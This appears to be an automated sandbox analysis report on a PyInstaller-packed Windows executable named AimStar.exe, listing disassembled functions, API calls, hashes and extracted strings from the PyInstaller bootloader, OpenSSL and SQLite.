Instruction Fuzzy Hash: C2D13872B0CE488DE710DF65D4412AC7B75FB457A8B848235DE5E97B89DE38E10AC390

Function 00007FF710F5F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF710F5FAEC
_get_daylight.LIBCMT ref: 00007FF710F5FAFD
_get_daylight.LIBCMT ref: 00007FF710F5FB0E
_isindst.LIBCMT ref: 00007FF710F5FBD9

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 1df53c408ac87d21559ad5b7a398082c095e1d7d5acafaa765a838ba00b1073c
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 0351E672F0CA1296EB14EF24D9566BCB7A9AB44378F900135DE1E52BE4DB38B50EC710

Function 00007FF710F557EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF710F5581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF710F55881
GetLastError.KERNEL32 ref: 00007FF710F55912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F55724), ref: 00007FF710F5595E

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: fdb5de7aaca57e00742cf106519a0bc47bce86131521b43fea6d55521e0ca2ca
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 39519F22E08A418AFB10EFB194663BDB3B9AB44B68F544435DE0997788DF3CE549C720

Function 00007FF710F420C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF710F420F4
SetWindowLongPtrW.USER32 ref: 00007FF710F42116
GetWindowLongPtrW.USER32 ref: 00007FF710F42140
InvalidateRect.USER32 ref: 00007FF710F42160

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 8a570ae75a92e774982ca7b832906848268e8ccc999ea8b94485a5429671bc05
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: E411E935B0C94682F694AB6AE5466B99295EBC47A0FC44030DF4947B8ACD2DF5C9C220

Function 00007FF710F65B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F617D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F61803

_get_daylight.LIBCMT ref: 00007FF710F65CA4
_get_daylight.LIBCMT ref: 00007FF710F65CB5

Strings

?, xrefs: 00007FF710F65C35

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: c12f4a4090ee76b10519ae58c5fd535dcff11de2ede003b17cb943a543ac468a
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: AA412716A0CB8241FB20AB25D40A37AF6A8EB80FB4F944235EE5C17BD5DE3CE449C710

Function 00007FF710F59084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F590B6

Part of subcall function 00007FF710F5A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF710F4CC15), ref: 00007FF710F590D4

Strings

C:\Users\user\Desktop\AimStar.exe, xrefs: 00007FF710F590C2

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\AimStar.exe
API String ID: 3580290477-2254353971
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: ef3b490f048f8a329f2fa1bfcd24d8d1d66c579bc2926647535106b817b576ca
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: 54418F36A0CF1686EB58BF2598420BCA7A8EF457E0B954035E94E43B85DE3CF589C360

Function 00007FF710F5CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF710F5CDBF
GetLastError.KERNEL32 ref: 00007FF710F5CDE1

Strings

U, xrefs: 00007FF710F5CD6B

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 6842dd85322821adde2f1955d3994eac806af9e481abc1da1606909e1ef9477a
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 9841C332B1CA4585DB609F25E4453AAA7B4FB887A4F804131EE4EC7788EF3CE505C750

Function 00007FF710F5F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF710F5F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF710F5F6BA

Strings

:, xrefs: 00007FF710F5F67E

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
Instruction ID: 89ac80d5289822b82ddf2ab77d10cbd3a83d44d7a06f022864e139933ba404c7
Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
Instruction Fuzzy Hash: 4221D522A0CA8182EB20AB15D04626EB3B9FB84B54FD54035DA8D43794DF7CFA4DCB61

Function 00007FF710F4FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF710F4FE08
RaiseException.KERNEL32 ref: 00007FF710F4FE49

Strings

csm, xrefs: 00007FF710F4FE36

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: e56dc178e188a9fdc7249747efffc83fafe547be828e979c5e87751b2456d957
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: BD113A32608B8582EB219B15E40425AB7E8FB88BA4F984230DE8D47765EF3CD559CB00

Function 00007FF710F607AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F607DC
GetDriveTypeW.KERNEL32 ref: 00007FF710F6081C

Strings

:, xrefs: 00007FF710F60805

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 3c52e08cedf941c1ae9b1750b3696222e2ae38ee0496ff96ed257582475d87fc
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: AB017126A1CA0685F720BF60946727EA3B4EF49728FD40036E54D82791DE2CF548CA24

Analysis Process: AimStar.exePID: 7332, Parent PID: 7284COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.9%
Total number of Nodes:	1076
Total number of Limit Nodes:	81

Executed Functions

Function 00007FF710F41000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF710F43B32
_PYI_ARCHIVE_FILE, xrefs: 00007FF710F438D2, 00007FF710F439FF
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF710F43971
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF710F43C61
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF710F43E0A
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF710F43D35
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF710F439DE
Failed to load splash screen resources!, xrefs: 00007FF710F43E85
Failed to convert DLL search path!, xrefs: 00007FF710F43DDC
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF710F43EBB
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF710F43D12
pkg, xrefs: 00007FF710F439BE
pyi-disable-windowed-traceback, xrefs: 00007FF710F43BB2
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF710F43A17, 00007FF710F43A2F, 00007FF710F43A9B
pyi-python-flag, xrefs: 00007FF710F43AD6
Failed to remove temporary directory: %s, xrefs: 00007FF710F43FC3
bye-runtime-tmpdir, xrefs: 00007FF710F43B68
pyi-contents-directory, xrefs: 00007FF710F43B8D
Could not create temporary directory!, xrefs: 00007FF710F43CBF
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF710F43BE8
Failed to start splash screen!, xrefs: 00007FF710F43ED4
MEI, xrefs: 00007FF710F43933
Py_GIL_DISABLED, xrefs: 00007FF710F43AF4
VCRUNTIME140.dll, xrefs: 00007FF710F43DB1
_PYI_SPLASH_IPC, xrefs: 00007FF710F43A23, 00007FF710F43EF5
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF710F43EA6
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF710F43882, 00007FF710F438AF
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF710F43A0B, 00007FF710F43CD4, 00007FF710F43F6B

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
Instruction ID: 1e33ddf3d0fd1846122f8d9e62ab027726d783c4b9834e4b14cc62656726858f
Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
Instruction Fuzzy Hash: 6C327C31E0CE8691EA15BB2194567B9A6A9EF44760FC48032DE5D833D6EF2CF55DC320

Function 00007FF8A92D1A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 858COMMON

Download Yara Rule

Strings

GET , xrefs: 00007FF8A931B8E8
POST , xrefs: 00007FF8A931B90B
, xrefs: 00007FF8A931B187
CONNE, xrefs: 00007FF8A931B95A
ssl3_get_record, xrefs: 00007FF8A931ACF1, 00007FF8A931AEA0, 00007FF8A931B016, 00007FF8A931B064, 00007FF8A931B094, 00007FF8A931B0BC, 00007FF8A931B0E9, 00007FF8A931B196, 00007FF8A931B1DF, 00007FF8A931B324, 00007FF8A931B34C, 00007FF8A931B3B8, 00007FF8A931B439, 00007FF8A931B593, 00007FF8A931B743, 00007FF8A931B7C2, 00007FF8A931B7EF, 00007FF8A931B821, 00007FF8A931B855, 00007FF8A931B887, 00007FF8A931B973, 00007FF8A931B9AD, 00007FF8A931BA20, 00007FF8A931BA51
PUT , xrefs: 00007FF8A931B943
..\s\ssl\record\ssl3_record.c, xrefs: 00007FF8A931ACF8, 00007FF8A931AEA7, 00007FF8A931B01D, 00007FF8A931B06B, 00007FF8A931B09B, 00007FF8A931B0C8, 00007FF8A931B0F5, 00007FF8A931B1A2, 00007FF8A931B1EB, 00007FF8A931B330, 00007FF8A931B358, 00007FF8A931B38F, 00007FF8A931B3C4, 00007FF8A931B445, 00007FF8A931B489, 00007FF8A931B4AB, 00007FF8A931B74F, 00007FF8A931B7CE, 00007FF8A931B7FB, 00007FF8A931B828, 00007FF8A931B861, 00007FF8A931B88E, 00007FF8A931B97F, 00007FF8A931B9B9, 00007FF8A931BA27, 00007FF8A931BA5D
HEAD , xrefs: 00007FF8A931B929

Memory Dump Source

Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd

Similarity

API ID:
String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
API String ID: 0-2781224710
Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
Instruction ID: 2eb24045a7d9ce66cc1eef5ace54aa878e430422fd0dfe1a543049dd788ccc79
Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
Instruction Fuzzy Hash: 31828E31A0EEC2A1FB649F21D8403BA62B1EF857C4F646036DA4DC76A9EF3CE5458711

Function 00007FF8A87B29E0 Relevance: 23.3, APIs: 2, Strings: 11, Instructions: 536COMMON

Download Yara Rule

Strings

generated, xrefs: 00007FF8A87B2B42
always, xrefs: 00007FF8A87B2A95
txet, xrefs: 00007FF8A87B3056
bolb, xrefs: 00007FF8A87B3063
buod, xrefs: 00007FF8A87B30A9
laer, xrefs: 00007FF8A87B3083
aolf, xrefs: 00007FF8A87B3096
rahc, xrefs: 00007FF8A87B3036
duplicate column name: %s, xrefs: 00007FF8A87B2E48
bolc, xrefs: 00007FF8A87B3049
too many columns on %s, xrefs: 00007FF8A87B2A33

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID:
String ID: always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$too many columns on %s$txet
API String ID: 0-2711416707
Opcode ID: 05ced19ffbda2af8d84160c6d126e85ab313c37855989897a54843a788ef34fb
Instruction ID: 1de4808d439d3b22269ef6788b659f7c551f300226ae59c58a5ddb2642f3b133
Opcode Fuzzy Hash: 05ced19ffbda2af8d84160c6d126e85ab313c37855989897a54843a788ef34fb
Instruction Fuzzy Hash: F9228722A4F5D269EB298B2590582B97BD3EB41BC4F448136DAAF473D1DF3CD9418328

Function 00007FF8A87692C0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A876938F
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A876946E
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8769490
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A876964E
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8769677

Strings

-journal, xrefs: 00007FF8A8769656
immutable, xrefs: 00007FF8A876980D
nolock, xrefs: 00007FF8A87697D5

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: -journal$immutable$nolock
API String ID: 2830847230-4201244970
Opcode ID: fc4aa575c3cfefd8825882f0133770488bd7e5ee514113ffe19fff9c73ff247a
Instruction ID: 029885a269e5684255da6d6b15cc2bfe56456d99943f04e220bd5be9acbe34f3
Opcode Fuzzy Hash: fc4aa575c3cfefd8825882f0133770488bd7e5ee514113ffe19fff9c73ff247a
Instruction Fuzzy Hash: 2732CC32A0A786AAEB658F25944437937A1FF45BE4F084234CA6E07BD5DF3CE451C328

Function 00007FF8A87CCFB0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87CD627

Strings

invalid, xrefs: 00007FF8A87CCFF2
misuse, xrefs: 00007FF8A87CD022
API call with %s database connection pointer, xrefs: 00007FF8A87CD004
unopened, xrefs: 00007FF8A87CCFFD
NULL, xrefs: 00007FF8A87CCFDD
%s at line %d of [%.10s], xrefs: 00007FF8A87CD02E
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A87CD015

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 2830847230-509082904
Opcode ID: bb2508857dcb7d8c4db46005c6d5cba0b088fe6dfdcbe4bc87886fb66250b61f
Instruction ID: c182001d29bc690e7ff90d623c0ef6e1bcfdc0cbe1c0e67e0c8a43e2c3765add
Opcode Fuzzy Hash: bb2508857dcb7d8c4db46005c6d5cba0b088fe6dfdcbe4bc87886fb66250b61f
